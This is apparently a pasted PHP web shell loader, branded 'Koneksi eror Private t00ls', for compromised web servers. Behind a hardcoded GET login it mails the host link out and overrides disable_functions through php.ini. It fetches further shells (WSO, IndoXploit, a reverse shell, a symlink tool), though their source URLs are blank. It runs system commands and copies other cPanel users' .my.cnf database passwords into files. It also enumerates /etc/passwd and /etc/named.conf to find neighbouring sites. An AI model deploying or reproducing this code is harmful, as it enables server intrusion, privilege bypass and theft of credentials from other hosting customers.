
tools Priv

Feb 2nd, 2019
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  1. <?
  2. error_reporting(0);
  3. ob_start();
  4. session_start();
  5. ob_end_clean();
  6. $host = $_SERVER['HTTP_HOST'];
  7. $user=$_GET["username"];
  8. $pass=$_GET["password"];
  9. if($user=="koneksi-eror" AND $pass=="arivin")
  10. {
  11. $_SESSION["username"]=$user;
  12. }
  13. ?>
  14. <title>Koneksi eror ~ Priv Login</title>
  15. <link href="" rel="stylesheet" type="text/css">
  16. <style>
  17. body {background:#2F302F;color:#fff;font-family: 'Share Tech Mono';}
  18. input[type=text] , input[type=password] {background:none;border-top:none;border-left:none;border-right:none;color: #02BC8C ;border-bottom:2px solid #02BC8C;font-family: 'Share Tech Mono';padding:2px 8px; -moz-border-radius: 7px; border-radius: 7px;width:30%;}
  19. input[type=submit] {background:#02BC8C;color:white;border:1px solid #02BC8C;font-family: 'Share Tech Mono';padding:2px 8px; -moz-border-radius: 10px; border-radius: 10px;width:10%;}
  20. .fak {background: #02BC8C ;color:#fff;border:1px solid #02BC8C;font-family: 'Share Tech Mono';padding:2px 8px; -moz-border-radius: 7px; border-radius: 7px;width:15%;}
  21. a {text-decoration:none;color:#02BC8C}
  22. </style>
  23. <br><br>
  24. <b>
  25. <?php
  26. error_reporting(0);
  27. ob_start();
  28. session_start();
  29. ob_end_clean();
  30. $subject = "Setor Guys -> ".$host;
  31. $message = "Link : ".$host."/".$_SERVER['PHP_SELF']."?user=$user&pass=$pass"; if(isset($_SESSION["username"])){
  32. mail("",$subject,$message,"From: $host" );
  33. // logout
  34. if(isset($_GET['logout'])){
  35. ob_start();
  36. session_start();
  37. ob_end_clean();
  38. session_destroy();
  39. }
  40. /* koneksi eror */
  41. $p = $_SERVER["HTTP_HOST"];
  42. $content = file_get_contents('');
  43. $fp = fopen($_SERVER['DOCUMENT_ROOT'] . "/history.html","w");
  44. if(fwrite($fp,$content)){
  45. $suck = "<font color=#02BC8C>OK</font>";
  46. $url = "http://$p/history.html";
  47. }else{
  48. $suck = "<font color=#F64747>ERROR</font>";
  49. $url = "/";
  50. }
  51. fclose($fp);
  52. // bypass
  53. $by = "disable_functions = none";
  54. $byy = fopen('php.ini', 'w');
  55. fwrite($byy,$by);
  56. fclose($byy);
  57. // fm
  58. $get = file_get_contents('');
  59. $bwt = fopen('fm.php', 'w');
  60. if(fwrite($bwt,$get)){
  61. $fm = "<a class=fak href=\"fm.php\">File Man</a>";
  62. }else{
  63. $fm = "<a class=fak>File Man</a>";
  64. }
  65. fclose($fp);
  66. // rshell
  67. $rs = file_get_contents('');
  68. $rs1 = fopen('rs.php', 'w');
  69. if(fwrite($rs1,$rs)){
  70. $rs2 = "<a class='fak' href='rs.php'>Rshell</a>";
  71. } else {
  72. $rs2 = "<a class=fak>Rshell</a>";
  73. }
  74. fclose($rs1);
  75. // idx
  76. $idx = file_get_contents('');
  77. $idx1 = fopen('idx.php', 'w');
  78. if(fwrite($idx1,$idx)){
  79. $idx2 = "<a class='fak' href='idx.php'>IndoXploit</a>";
  80. } else {
  81. $idx2 = "<a class=fak>IndoXploit</a>";
  82. }
  83. fclose($idx1);
  84. // wso
  85. $wso = file_get_contents('');
  86. $wso1 = fopen('wso.php', 'w');
  87. if(fwrite($wso1,$wso)){
  88. $wso2 = "<a class='fak' href='wso.php'>Wso Shell</a>";
  89. } else {
  90. $wso2 = "<a class=fak>Wso Shell</a>";
  91. }
  92. fclose($wso1);
  93. // Database
  94. $db = file_get_contents('');
  95. $db1 = fopen('db.php', 'w');
  96. if(fwrite($db1,$db)){
  97. $db2 = "<a class='fak' href='db.php'>Database</a>";
  98. } else {
  99. $db2 = "<a class=fak>Database</a>";
  100. }
  101. fclose($db1);
  102. // Sym
  103. $sym = file_get_contents('');
  104. $sym1 = fopen('sym.php', 'w');
  105. if(fwrite($sym1,$sym)){
  106. $sym2 = "<a class='fak' href='sym.php'>Symlink</a>";
  107. } else {
  108. $sym2 = "<a class=fak>Symlink</a>";
  109. }
  110. fclose($sym1);
  111. // exe
  112. function exe($cmd) {
  113. if(function_exists('system')){
  114. @ob_start();
  115. @system($cmd);
  116. $buff = @ob_get_contents();
  117. @ob_end_clean();
  118. return $buff;
  119. } elseif(function_exists('exec')){
  120. @exec($cmd,$results);
  121. $buff = "";
  122. foreach($results as $result) {
  123. $buff .= $result;
  124. }
  125. return $buff;
  126. } elseif(function_exists('passthru')){
  127. @ob_start();
  128. @passthru($cmd);
  129. $buff = @ob_get_contents();
  130. @ob_end_clean();
  131. return $buff;
  132. } elseif(function_exists('shell_exec')){
  133. $buff = @shell_exec($cmd);
  134. return $buff;
  135. }
  136. }
  137. // info
  138. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  139. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=#F64747>ON</font>" : "<font color=#18BC9C>OFF</font>";
  140. $ds = @ini_get("disable_functions");
  141. $mysql = (function_exists('mysql_connect')) ? "<font color=#18BC9C>ON</font>" : "<font color=#F64747>OFF</font>";
  142. $curl = (function_exists('curl_version')) ? "<font color=#18BC9C>ON</font>" : "<font color=#F64747>OFF</font>";
  143. $wget = (exe('wget --help')) ? "<font color=#18BC9C>ON</font>" : "<font color=#F64747>OFF</font>";
  144. $show_ds = (!empty($ds)) ? "<font color=#F64747>ON</font>" : "<font color=#18BC9C>NONE</font>";
  145. $user = @get_current_user();
  146. $uid = @getmyuid();
  147. $gid = @getmygid();
  148. // lets
  149. echo "<center><font new size='7'>koneksi eror ~ Private t00ls</font><br>".php_uname()."<br>Safe_Mod : $sm | IP : $ip | User : $user($uid/$gid) | Dis : $show_ds | Mysql : $mysql | cURL : $curl <br>root@ndutt : ".getcwd()." [ <a href='$url'>$suck</a> ]";
  150. // menu
  151. echo "<br><br>$fm $rs2 $idx2 $wso2 $sym2 $db2<br><br>";
  152. echo "&copy; 2016 - 2018 UstadCage_48 - BebyYers ~";
  153. // domain
  154. $file = @implode(@file("/etc/named.conf"));
  155. preg_match_all("#named/(.*?).db#",$file ,$r);
  156. $domains = array_unique($r[1]);
  157. {
  158. $do = "".count($domains)."";
  159. echo "<br>Ada [ ".$do." ] Domain";
  160. }
  161. // cp
  162. @ini_set('display_errors',0);
  163. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  164. $ar0=explode($marqueurDebutLien, $text);
  165. $ar1=explode($marqueurFinLien, $ar0[$i]);
  166. return trim($ar1[0]);
  167. }
  168. $d0mains = @file('/etc/named.conf');
  169. $domains = scandir("/var/named");
  170. if($domains or $d0mains){
  171. $domains = scandir("/var/named");
  172. if($domains) {
  173. $count=1;
  174. $dc = 0;
  175. $list = scandir("/var/named");
  176. foreach($list as $domain){
  177. if(strpos($domain,".db")){
  178. $domain = str_replace('.db','',$domain);
  179. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  180. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  181. $path = getcwd();
  182. if (is_readable($dirz)) {
  183. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  184. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  185. $password=entre2v2($p,'password="','"');
  186. $dc++;
  187. }}}
  188. $total = $dc;
  189. echo '<br>'.$total.' Cpanel Berhasil Di Crack <br />';
  190. }else{
  191. $d0mains = @file('/etc/named.conf');
  192. if($d0mains){
  193. $count=1;
  194. $dc = 0;
  195. $mck = array();
  196. foreach($d0mains as $d0main){
  197. if(@eregi('zone',$d0main)){
  198. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  199. flush();
  200. if(strlen(trim($domain[1][0])) >2){
  201. $mck[] = $domain[1][0];
  202. }}}
  203. $mck = array_unique($mck);
  204. $usr = array();
  205. $dmn = array();
  206. foreach($mck as $o) {
  207. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  208. $usr[] = $infos['name'];
  209. $dmn[] = $o;
  210. }
  211. array_multisort($usr,$dmn);
  212. $dt = file('/etc/passwd');
  213. $passwd = array();
  214. foreach($dt as $d) {
  215. $r = explode(':',$d);
  216. if(strpos($r[5],'home')){
  217. $passwd[$r[0]] = $r[5];
  218. }}
  219. $l=0;
  220. $j=1;
  221. foreach($usr as $r){
  222. $dirz = '/home/'.$r.'/.my.cnf';
  223. $path = getcwd();
  224. if (is_readable($dirz)) {
  225. copy($dirz, ''.$path.'/'.$r.'.txt');
  226. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  227. $password=entre2v2($p,'password="','"');
  228. $dc++;
  229. flush();
  230. $l=$l?0:1;
  231. $j++;
  232. }}}
  233. $total = $dc;
  234. echo '<br>'.$total.' Cpanel Berhasil Di Crack <br />';
  235. }
  236. }else{
  237. echo "<br><font color='#fff'>Info Cpanel : </font> <font color='#02BC8C'> Not Accessible!</font><br>";
  238. }
  239. // jump
  240. set_time_limit(0);
  241. @$passwd = fopen('/etc/passwd','r');
  242. if(!$passwd){ die('<b> Jumping Info : <font color="#02BC8C">Wew Ternyata Tidak Ada Web Yg Bisa Di Ikeh Ikeh >_< </font></b>'); }
  243. $pub = array();
  244. $users = array();
  245. $conf = array();
  246. $i = 0;
  247. while(!feof($passwd)){
  248. $str = fgets($passwd);
  249. if($i > 35){
  250. $pos = strpos($str,':');
  251. $username = substr($str,0,$pos);
  252. $dirz = '/home/'.$username.'/public_html/';
  253. if(($username != '')){
  254. if(is_readable($dirz)){
  255. array_push($users,$username);
  256. array_push($pub,$dirz);
  257. }}}
  258. $i++;
  259. }
  260. echo " Jumping Info : Di Temukan <font color=#02BC8C> ".sizeof($users)." </font> Web Dalam Server $ip >_<"."<br />";
  261. }else{
  262. echo '<center>
  263. Koneksi Eror Private<br><pre>
  264. ________ ___ ___________
  265. \______ \ ____ ______ / _ \_/\ \__ ___/___ _____ _____
  266. | | \_/ __ \\____ \ \/ \___/ | |_/ __ \\__ \ / \
  267. | ` \ ___/| |_> > | |\ ___/ / __ \| Y Y \
  268. /_______ /\___ > __/ |____| \___ >____ /__|_| /
  269. \/ \/|__| \/ \/ \/
  270. </font>
  271. </pre>"Depression Team"<br>
  272. '.$_SERVER['HTTP_HOST'].'
  273. <form method="GET" action="">
  274. <p><input type="text" name="username" value="" placeholder="User"></p>
  275. <p><input type="password" name="password" value="" placeholder="Pass"></p>
  276. <p><input type="submit" name="commit" value="Login"></p>
  277. </form>
  278. </center>
  279. ';
  280. }
  281. ?>
  282. </b>
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